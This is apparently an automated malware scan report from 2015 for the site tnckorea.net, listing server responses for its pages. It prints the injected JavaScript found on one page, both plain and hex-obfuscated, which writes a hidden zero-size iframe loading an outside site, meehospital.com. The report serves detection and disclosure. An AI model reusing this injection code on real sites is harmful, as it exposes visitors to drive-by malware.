Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tnckorea.net
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://tnckorea.net/ | HTTP/1.1 302 Object moved Cache-Control: private Date: Mon, 12 Jan 2015 20:54:24 GMT Location: http://tnckorea.net/main Server: Microsoft-IIS/6.0 Content-Length: 145 Content-Type: text/html P3P: CP=ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC Set-Cookie: PUID=734CE9D621644D4E911687E2F9B57949; domain=tnckorea.net; path=/ Set-Cookie: ASPSESSIONIDCSDQSSQB=GNHFFJBCECFILGMOKOPHNKII; path=/ X-Powered-By: ASP.NET | clean |
http://tnckorea.net/main | HTTP/1.1 301 Moved Permanently Date: Mon, 12 Jan 2015 20:54:25 GMT Location: http://tnckorea.net/main/ Server: Microsoft-IIS/6.0 Content-Length: 171 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://tnckorea.net/main/ | HTTP/1.1 302 Object moved Cache-Control: private Date: Mon, 12 Jan 2015 20:54:28 GMT Location: /main/main_real.asp Server: Microsoft-IIS/6.0 Content-Length: 140 Content-Type: text/html P3P: CP=ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC Set-Cookie: PUID=8CA80E53030D472AB26829FA3DB8053A; domain=tnckorea.net; path=/ Set-Cookie: ASPSESSIONIDCSDQSSQB=KNHFFJBCMOPKOHFAFHMKCFLK; path=/ X-Powered-By: ASP.NET | clean |
http://tnckorea.net/main/main_real.asp | 200 OK Content-Length: 86509 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
if(document.cookie.indexOf('long=')==-1){ var expires=new Date(); expires.setTime(expires.getTime () +12*60*60*1000); document.cookie='long=Yes;path=/;expires='+expires.toGMTString(); document.write("<iframe src=http://meehospital.com/swf/index.html width=0 height=0></iframe>");}
Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://meehospital.com/swf/index.html
<iframe src=http://meehospital.com/swf/index.html width=0 height=0>
http://oxbdigital.com/js/js.js | 200 OK Content-Length: 832 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame:
var _$=["\x64\x6f\x63\x75\x6d\x65\x6e\x74","\x63\x6f\x6f\x6b\x69\x65","\x69\x6e\x64\x65\x78\x4f\x66",'\x6c\x6f\x6e\x67\x3d',"\x73\x65\x74\x54\x69\x6d\x65","\x67\x65\x74\x54\x69\x6d\x65",'\x6c\x6f\x6e\x67\x3d\x59\x65\x73\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d',"\x74\x6f\x47\x4d\x54\x53\x74\x72\x69\x6e\x67","\x77\x72\x69\x74\x65","\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x2f\x2f\x6d\x65\x65\x68\x6f\x73\x70\x69\x74\x61\x6c\x2e\x63\x6f\x6d\x2f\x73\x77\x66\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x20\x77\x69\x64\x74\x68\x3d\x30\x20\x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e"];if(window[_$[0]][_$[1]][_$[2]](_$[3])==-0x1){var a=new Date();a[_$[4]](a[_$[5]]()+0xc*0x3c*0x3c*0x3e8);window[_$[0]][_$[1]]=_$[6]+a[_$[7]]();window[_$[0]][_$[8]](_$[9])}
Decoded script:
<iframe src=http://meehospital.com/swf/index.html width=0 height=0></iframe>
http://tnckorea.net/jscript/common.js | 200 OK Content-Length: 22768 Content-Type: application/x-javascript | clean |
http://tnckorea.net/jscript/embed.js | 200 OK Content-Length: 2953 Content-Type: application/x-javascript | clean |
http://tnckorea.net/jscript/ajax.js | 200 OK Content-Length: 2358 Content-Type: application/x-javascript | clean |
http://tnckorea.net/jscript/json.js | 200 OK Content-Length: 5095 Content-Type: application/x-javascript | clean |
http://tnckorea.net/jscript/rollover.js | 200 OK Content-Length: 1033 Content-Type: application/x-javascript | clean |
http://tnckorea.net/jscript/user_func.js | 200 OK Content-Length: 2641 Content-Type: application/x-javascript | clean |
http://tnckorea.net/popup_main.js.asp | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
http://tnckorea.net/test404page.js | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
http://tnckorea.net/jscript/cookie.js | 200 OK Content-Length: 1022 Content-Type: application/x-javascript | clean |
http://tnckorea.net/jscript/floating.js | 200 OK Content-Length: 3457 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tnckorea.net
Result:
HTTP/1.1 302 Object moved
Cache-Control: private
Date: Mon, 12 Jan 2015 20:54:24 GMT
Location: http://tnckorea.net/main
Server: Microsoft-IIS/6.0
Content-Length: 145
Content-Type: text/html
P3P: CP=ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC
Set-Cookie: PUID=734CE9D621644D4E911687E2F9B57949; domain=tnckorea.net; path=/
Set-Cookie: ASPSESSIONIDCSDQSSQB=GNHFFJBCECFILGMOKOPHNKII; path=/
X-Powered-By: ASP.NET
...145 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: tnckorea.net
Referer: http://www.google.com/search?q=tnckorea.net
Result:
The result is similar to the first query. There are no suspicious redirects found.